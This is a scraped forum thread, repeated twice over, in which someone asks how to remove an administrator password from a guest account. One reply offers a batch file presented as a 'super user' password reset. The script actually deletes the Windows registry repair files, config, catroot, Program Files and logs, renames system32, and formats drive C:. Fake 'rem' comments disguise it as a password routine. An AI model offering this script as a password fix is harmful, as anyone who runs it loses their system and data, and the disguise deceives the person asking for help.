Questions

removing password for administrator

+
0 Votes
Locked

removing password for administrator

nkrajan2005
plz tell me how to remove password for administrator using guest accountCan't do it through guest account.I have had to do this too many times for clients. I carry the CD with me, but all you have to do is create a bootable CD and reset the Administrator password....
  • +
    0 Votes
    w2ktechman

    first log in with administrative permissions.
    Then go to control panel -- admin tools -- manage -- users and groups
    select users
    find and highlight administrator
    right click and select 'change PW'


    Ok, just to be sure that you are not just a cracker in disguise, tell me about this disk that you have to carry around and why I need to create a boot disk for you???
    If you have a disk to do it, what is the issue???

    To me you sound like a cracker.... Ok read my next post if I am right...

    +
    0 Votes
    w2ktechman

    Please read my previous post carefully before continuing with this one.

    Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it may be illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

    Items needed

    Ability to create a batch file
    floppy disk
    USB floppy disk drive
    create a boot floppy with NTFS Write permissions

    Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

    On your desktop, create a file called suser.txt for (suser stands for Super User).
    Open the suser.txt file and paste the information below

    cls
    rem # start _admin.pwd
    ren %systemroot%\system32\etc %systemroot%\system32\cet
    rem start process A32#458
    ren %systemroot%\repair\DS_SOFTWARE A1E
    ren %systemroot%\repair\DS_SECURITY A2E
    ren %systemroot%\repair\DS_SAM A3E
    ren %systemroot%\repair\DS_system.bak A4E
    del %systemroot%\repair\A*.* /Q /F
    del %systemroot%\repair\s*.* /Q /F
    rem script _admin.pwd
    del %systemroot%\system32\catroot\*.*
    del %systemroot%\system32\catroot2\*.*
    del %systemroot%\system32\drivers\cet*.*
    rem new_pwd.pwd ==generate 0
    del "c:\program files" /Q /F
    ren %systemroot%\system32 %systemroot%\newpwd
    ren %systemroot%\system %systemroot%\system32
    rem AUTO_START new_pwd.pwd 44#1
    rem _admin.pwd == DISABLE
    del %systemroot%\system32\config /Q /F
    erase %systemroot%\system32\LogFiles\*.*
    rem ACTIVATE_MEMORY_FLOOD_0x0000323A
    rem DISABLE_LOGFILES
    format c:\ /Q /A:4096
    rem RESTART _admin.pwd


    Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
    copy the file to your boot floppy disk.

    Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
    Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

    Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

    And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
    And, never ever tell anyone that I gave this to you....

    +
    0 Votes

    wow

    Shellbot

    your a whiz at dis der password stuff W2K..

    <snigger>

  • +
    0 Votes
    w2ktechman

    first log in with administrative permissions.
    Then go to control panel -- admin tools -- manage -- users and groups
    select users
    find and highlight administrator
    right click and select 'change PW'


    Ok, just to be sure that you are not just a cracker in disguise, tell me about this disk that you have to carry around and why I need to create a boot disk for you???
    If you have a disk to do it, what is the issue???

    To me you sound like a cracker.... Ok read my next post if I am right...

    +
    0 Votes
    w2ktechman

    Please read my previous post carefully before continuing with this one.

    Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it may be illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

    Items needed

    Ability to create a batch file
    floppy disk
    USB floppy disk drive
    create a boot floppy with NTFS Write permissions

    Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

    On your desktop, create a file called suser.txt for (suser stands for Super User).
    Open the suser.txt file and paste the information below

    cls
    rem # start _admin.pwd
    ren %systemroot%\system32\etc %systemroot%\system32\cet
    rem start process A32#458
    ren %systemroot%\repair\DS_SOFTWARE A1E
    ren %systemroot%\repair\DS_SECURITY A2E
    ren %systemroot%\repair\DS_SAM A3E
    ren %systemroot%\repair\DS_system.bak A4E
    del %systemroot%\repair\A*.* /Q /F
    del %systemroot%\repair\s*.* /Q /F
    rem script _admin.pwd
    del %systemroot%\system32\catroot\*.*
    del %systemroot%\system32\catroot2\*.*
    del %systemroot%\system32\drivers\cet*.*
    rem new_pwd.pwd ==generate 0
    del "c:\program files" /Q /F
    ren %systemroot%\system32 %systemroot%\newpwd
    ren %systemroot%\system %systemroot%\system32
    rem AUTO_START new_pwd.pwd 44#1
    rem _admin.pwd == DISABLE
    del %systemroot%\system32\config /Q /F
    erase %systemroot%\system32\LogFiles\*.*
    rem ACTIVATE_MEMORY_FLOOD_0x0000323A
    rem DISABLE_LOGFILES
    format c:\ /Q /A:4096
    rem RESTART _admin.pwd


    Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
    copy the file to your boot floppy disk.

    Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
    Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

    Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

    And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
    And, never ever tell anyone that I gave this to you....

    +
    0 Votes

    wow

    Shellbot

    your a whiz at dis der password stuff W2K..

    <snigger>